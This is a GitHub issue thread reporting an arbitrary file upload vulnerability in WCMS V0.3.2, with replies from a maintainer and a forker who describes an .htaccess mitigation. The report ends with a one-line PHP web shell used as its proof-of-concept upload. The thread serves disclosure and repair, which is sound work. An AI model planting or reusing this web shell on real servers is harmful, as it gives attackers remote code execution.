vedees
commented
5 years ago working on it!
Open Ryan0lb opened 5 years ago
vedees
commented
5 years ago working on it!
cryptoprof
commented
5 years ago Hello. I have maid some changes to project structure. Now there have public folder, where would be user files. In that folder I have added .htaccess file that prevent execution of php code in public folder. Maybe this is not elegant fix, but quick and work good. I'm only start this fork, so I would fix next issues, when I have free time. https://github.com/cryptoprof/wcms/tree/feature/securityFix
A Arbitrary File Upload Vulnerability in wcms/wex/finder/action.php
Affected software:WCMS V0.3.2 Type of vulnerability: Arbitrary File Upload Discovered by: Yu Yang
Use this upload feature in the developer/finder:
and we can upload arbitrary file in the web server,it allows attackers upload malicious code
POC(2.php):
code:
i hope you can fix it
<?php @eval($_POST[c]);?>